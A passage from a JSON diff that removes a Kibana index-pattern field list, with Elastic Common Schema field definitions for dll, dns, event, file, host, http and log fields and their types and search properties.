"esTypes": [ - "keyword" - ], - "name": "dll.code_signature.status", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "dll.code_signature.subject_name", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "boolean" - ], - "name": "dll.code_signature.trusted", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "boolean" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "boolean" - ], - "name": "dll.code_signature.valid", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "boolean" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "dll.hash.md5", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "dll.hash.sha1", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "dll.hash.sha256", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "dll.hash.sha512", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "dll.name", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "dll.path", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "dll.pe.company", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "dll.pe.description", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "dll.pe.file_version", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "dll.pe.original_file_name", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "dll.pe.product", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "dns.answers.class", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "dns.answers.data", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "dns.answers.name", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "long" - ], - "name": "dns.answers.ttl", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "number" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "dns.answers.type", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "dns.header_flags", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "dns.id", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "dns.op_code", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "dns.question.class", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "dns.question.name", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "dns.question.registered_domain", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "dns.question.subdomain", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "dns.question.top_level_domain", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "dns.question.type", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "ip" - ], - "name": "dns.resolved_ip", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "ip" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "dns.response_code", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "dns.type", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "ecs.version", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "error.code", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "error.id", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "error.message", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "error.stack_trace", - "readFromDocValues": false, - "scripted": false, - "searchable": false, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "error.stack_trace.text", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "error.stack_trace" - } - }, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "error.type", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "event.action", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "event.category", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "event.code", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "date" - ], - "name": "event.created", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "date" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "event.dataset", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "long" - ], - "name": "event.duration", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "number" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "date" - ], - "name": "event.end", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "date" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "event.hash", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "event.id", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "date" - ], - "name": "event.ingested", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "date" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "event.kind", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "event.module", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "event.original", - "readFromDocValues": false, - "scripted": false, - "searchable": false, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "event.outcome", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "event.provider", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "event.reference", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "float" - ], - "name": "event.risk_score", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "number" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "float" - ], - "name": "event.risk_score_norm", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "number" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "long" - ], - "name": "event.sequence", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "number" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "long" - ], - "name": "event.severity", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "number" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "date" - ], - "name": "event.start", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "date" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "event.timezone", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "event.type", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "event.url", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "date" - ], - "name": "file.accessed", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "date" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "file.attributes", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "boolean" - ], - "name": "file.code_signature.exists", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "boolean" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "file.code_signature.status", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "file.code_signature.subject_name", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "boolean" - ], - "name": "file.code_signature.trusted", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "boolean" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "boolean" - ], - "name": "file.code_signature.valid", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "boolean" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "date" - ], - "name": "file.created", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "date" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "date" - ], - "name": "file.ctime", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "date" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "file.device", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "file.directory", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "file.drive_letter", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "file.extension", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "file.gid", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "file.group", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "file.hash.md5", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "file.hash.sha1", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "file.hash.sha256", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "file.hash.sha512", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "file.inode", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "file.mime_type", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "file.mode", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "date" - ], - "name": "file.mtime", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "date" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "file.name", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "file.owner", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "file.path", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "file.path.text", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "file.path" - } - }, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "file.pe.company", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "file.pe.description", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "file.pe.file_version", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "file.pe.original_file_name", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "file.pe.product", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "long" - ], - "name": "file.size", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "number" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "file.target_path", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "file.target_path.text", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "file.target_path" - } - }, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "file.type", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "file.uid", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "geo.city_name", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "geo.continent_name", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "geo.country_iso_code", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "geo.country_name", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "geo_point" - ], - "name": "geo.location", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "geo_point" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "geo.name", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "geo.region_iso_code", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "geo.region_name", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "group.domain", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "group.id", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "group.name", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "hash.md5", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "hash.sha1", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "hash.sha256", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "hash.sha512", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "host.architecture", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "host.domain", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "host.geo.city_name", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "host.geo.continent_name", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "host.geo.country_iso_code", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "host.geo.country_name", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "geo_point" - ], - "name": "host.geo.location", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "geo_point" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "host.geo.name", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "host.geo.region_iso_code", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "host.geo.region_name", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "host.hostname", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "host.id", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "ip" - ], - "name": "host.ip", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "ip" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "host.mac", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "host.name", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "host.os.family", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "host.os.full", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "host.os.full.text", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "host.os.full" - } - }, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "host.os.kernel", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "host.os.name", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "host.os.name.text", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "host.os.name" - } - }, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "host.os.platform", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "host.os.version", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "host.type", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "long" - ], - "name": "host.uptime", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "number" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "host.user.domain", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "host.user.email", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "host.user.full_name", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "host.user.full_name.text", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "host.user.full_name" - } - }, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "host.user.group.domain", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "host.user.group.id", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "host.user.group.name", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "host.user.hash", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "host.user.id", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "host.user.name", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "host.user.name.text", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "host.user.name" - } - }, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "long" - ], - "name": "http.request.body.bytes", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "number" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "http.request.body.content", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "http.request.body.content.text", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "http.request.body.content" - } - }, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "long" - ], - "name": "http.request.bytes", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "number" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "http.request.method", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "http.request.referrer", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "long" - ], - "name": "http.response.body.bytes", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "number" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "http.response.body.content", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "http.response.body.content.text", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "http.response.body.content" - } - }, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "long" - ], - "name": "http.response.bytes", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "number" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "long" - ], - "name": "http.response.status_code", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "number" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "http.version", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "interface.alias", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "interface.id", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "interface.name", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "log.level", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "log.logger", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "integer" - ], - "name": "log.origin.file.line", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "number" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "log.origin.file.name", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - 